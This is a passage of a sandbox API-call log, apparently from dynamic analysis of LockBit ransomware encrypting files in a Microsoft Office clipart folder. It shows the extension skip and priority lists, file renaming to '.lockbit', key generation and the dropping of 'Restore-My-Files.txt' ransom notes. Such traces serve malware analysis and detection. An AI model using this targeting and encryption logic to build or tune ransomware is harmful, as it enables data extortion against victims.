(lpString1=".rdp", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00057_.WMF") returned 1 [0117.126] lstrcmpiW (lpString1="ntldr", lpString2="HH00057_.WMF") returned 1 [0117.126] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00057_.WMF") returned 1 [0117.126] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00057_.WMF") returned -1 [0117.126] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00057_.WMF") returned -1 [0117.126] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00057_.WMF") returned 1 [0117.126] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00057_.WMF") returned 1 [0117.126] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.126] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF") returned=".WMF" [0117.126] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.126] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.126] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.127] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.127] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.lockbit") returned 72 [0117.127] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00057_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x340 [0117.135] CreateIoCompletionPort (FileHandle=0x340, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.135] malloc (_Size=0x40068) returned 0x3d70450 [0117.135] GetFileSizeEx (in: hFile=0x340, lpFileSize=0x3d70468 | out: lpFileSize=0x3d70468*=3764) returned 1 [0117.135] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.135] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0484, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0484) returned 0x0 [0117.136] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.136] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.136] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3db0494, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3db0494) returned 0x0 [0117.136] ReadFile (in: hFile=0x340, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0117.140] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.140] malloc (_Size=0xa6) returned 0x77d7a8 [0117.140] NtSetInformationFile (FileHandle=0x340, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.141] free (_Block=0x77d7a8) [0117.141] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00057_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.141] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.141] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.141] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf0af3b00, ftCreationTime.dwHighDateTime=0x1bd4b29, ftLastAccessTime.dwLowDateTime=0x5386f090, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf0af3b00, ftLastWriteTime.dwHighDateTime=0x1bd4b29, nFileSizeHigh=0x0, nFileSizeLow=0x9a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00084_.WMF", cAlternateFileName="")) returned 1 [0117.141] lstrcmpiW (lpString1=".", lpString2="HH00084_.WMF") returned -1 [0117.141] lstrcmpiW (lpString1="..", lpString2="HH00084_.WMF") returned -1 [0117.142] PathFindExtensionW (pszPath="HH00084_.WMF") returned=".WMF" [0117.142] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.142] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.143] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.143] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00084_.WMF") returned 1 [0117.144] lstrcmpiW (lpString1="ntldr", lpString2="HH00084_.WMF") returned 1 [0117.144] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00084_.WMF") returned 1 [0117.144] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00084_.WMF") returned -1 [0117.144] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00084_.WMF") returned -1 [0117.144] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00084_.WMF") returned 1 [0117.144] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00084_.WMF") returned 1 [0117.144] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.144] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF") returned=".WMF" [0117.144] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.144] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.144] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.145] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.145] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.lockbit") returned 72 [0117.145] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00084_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0117.149] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.149] malloc (_Size=0x40068) returned 0x3e70008 [0117.149] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=2472) returned 1 [0117.149] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0117.150] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.150] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.150] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0117.150] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0117.152] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.152] malloc (_Size=0xa6) returned 0x77d7a8 [0117.153] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0117.153] free (_Block=0x77d7a8) [0117.153] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00084_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.153] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.153] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.153] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf81f1600, ftCreationTime.dwHighDateTime=0x1bd4b22, ftLastAccessTime.dwLowDateTime=0x61c80c70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf81f1600, ftLastWriteTime.dwHighDateTime=0x1bd4b22, nFileSizeHigh=0x0, nFileSizeLow=0x8b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH00231_.WMF", cAlternateFileName="")) returned 1 [0117.154] lstrcmpiW (lpString1=".", lpString2="HH00231_.WMF") returned -1 [0117.154] lstrcmpiW (lpString1="..", lpString2="HH00231_.WMF") returned -1 [0117.154] PathFindExtensionW (pszPath="HH00231_.WMF") returned=".WMF" [0117.154] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0117.154] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0117.155] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0117.155] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH00231_.WMF") returned 1 [0117.156] lstrcmpiW (lpString1="ntldr", lpString2="HH00231_.WMF") returned 1 [0117.156] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH00231_.WMF") returned 1 [0117.156] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH00231_.WMF") returned -1 [0117.156] lstrcmpiW (lpString1="autorun.inf", lpString2="HH00231_.WMF") returned -1 [0117.156] lstrcmpiW (lpString1="thumbs.db", lpString2="HH00231_.WMF") returned 1 [0117.156] lstrcmpiW (lpString1="iconcache.db", lpString2="HH00231_.WMF") returned 1 [0117.156] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0117.156] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF") returned=".WMF" [0117.156] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0117.156] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0117.156] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0117.157] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0117.158] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0117.158] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.lockbit") returned 72 [0117.158] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh00231_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2f4 [0117.162] CreateIoCompletionPort (FileHandle=0x2f4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0117.162] malloc (_Size=0x40068) returned 0x3db04c0 [0117.162] GetFileSizeEx (in: hFile=0x2f4, lpFileSize=0x3db04d8 | out: lpFileSize=0x3db04d8*=2232) returned 1 [0117.162] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df04f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df04f4) returned 0x0 [0117.163] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0117.163] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0117.163] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3df0504, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3df0504) returned 0x0 [0117.163] ReadFile (in: hFile=0x2f4, lpBuffer=0x3db04f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0 | out: lpBuffer=0x3db04f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3db04c0) returned 1 [0117.676] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0117.676] malloc (_Size=0xa6) returned 0x77d7a8 [0117.676] NtSetInformationFile (FileHandle=0x2f4, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0117.676] free (_Block=0x77d7a8) [0117.676] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH00231_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0117.676] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0117.676] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0117.676] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: 